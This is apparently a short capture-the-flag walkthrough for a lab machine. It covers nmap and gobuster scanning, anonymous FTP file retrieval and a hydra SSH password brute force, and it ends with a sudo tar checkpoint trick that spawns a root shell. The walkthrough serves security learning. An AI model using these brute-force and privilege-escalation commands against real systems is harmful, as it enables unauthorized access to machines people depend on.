sudo nmap -T4 -p- -A (ip)
- anonymous access to
FTP
on port 21 - HTTP page and Apache 2.4.18 server on port 80
SSH
on port 22
This page is useful anecdotally, but there's really nothing we can use later, except for some names as potential usernames
.
gobuster dir -w (wordlist) -u (url)
ftp (ip)
All we need to do now is read the files, so let's use the get(filename)
command and read them to our machine.
Let's put these names on the web page into a file that includes the name we found in task.txt
and call it user.txt
.
Since we only have ssh
, the next step we need to do is run hydra
to force ssh
login to use the password list which is locks.txt
.
hydra ssh://ip -L users.txt -P locks.txt
Trying to get to root is impossible at the moment because we are currently just the user *** himself.
Go to gtfobins and search for tar
sudo tar -cf /dev/null /dev/null — checkpoint=1 — checkpoint-action=exec=/bin/sh